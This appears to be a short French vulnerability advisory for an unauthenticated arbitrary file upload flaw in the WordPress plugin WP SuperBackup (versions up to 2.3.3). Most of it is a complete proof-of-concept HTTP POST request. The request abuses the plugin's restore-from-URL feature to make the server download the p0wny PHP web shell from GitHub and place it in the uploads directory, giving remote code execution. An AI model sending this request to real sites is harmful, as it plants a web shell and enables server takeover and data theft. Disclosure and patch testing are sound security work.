
WP SuperBackup <= 2.3.3 - Téléversement de fichier arbitraire non authentifié
WP SuperBackup <= 2.3.3 - Téléversement arbitraire de fichiers non authentifié
Le plugin WordPress Super Backup & Clone - Migrate for WordPress est vulnérable au téléversement arbitraire de fichiers en raison de l'absence de validation du type de fichier dans toutes les versions jusqu'à la version 2.3.3 incluse. Cela permet à des attaquants non authentifiés de téléverser des fichiers arbitraires sur le serveur du site affecté, ce qui peut rendre possible l'exécution de code à distance.
Le shell met un certain temps à apparaître... il apparaîtra dans /wp-content/uploads/isnapshots/shell.php
POST /wp-admin/admin.php?page=ibk_admin&tab=restore HTTP/1.1
Host: kubernetes.docker.internal:8929
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://kubernetes.docker.internal:8929/wp-admin/admin.php?page=ibk_admin&tab=restore
Content-Type: multipart/form-data; boundary=---------------------------24461452295617717774000608677
Content-Length: 688
Origin: http://kubernetes.docker.internal:8929
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Priority: u=0, i
-----------------------------24461452295617717774000608677
Content-Disposition: form-data; name="ibk_restore_migrate_action"
1
-----------------------------24461452295617717774000608677
Content-Disposition: form-data; name="restore_type"
restore_url
-----------------------------24461452295617717774000608677
Content-Disposition: form-data; name="restore_url"
https://raw.githubusercontent.com/flozz/p0wny-shell/refs/heads/master/shell.php
-----------------------------24461452295617717774000608677
Content-Disposition: form-data; name="upload_file"; filename=""
Content-Type: application/octet-stream
-----------------------------24461452295617717774000608677--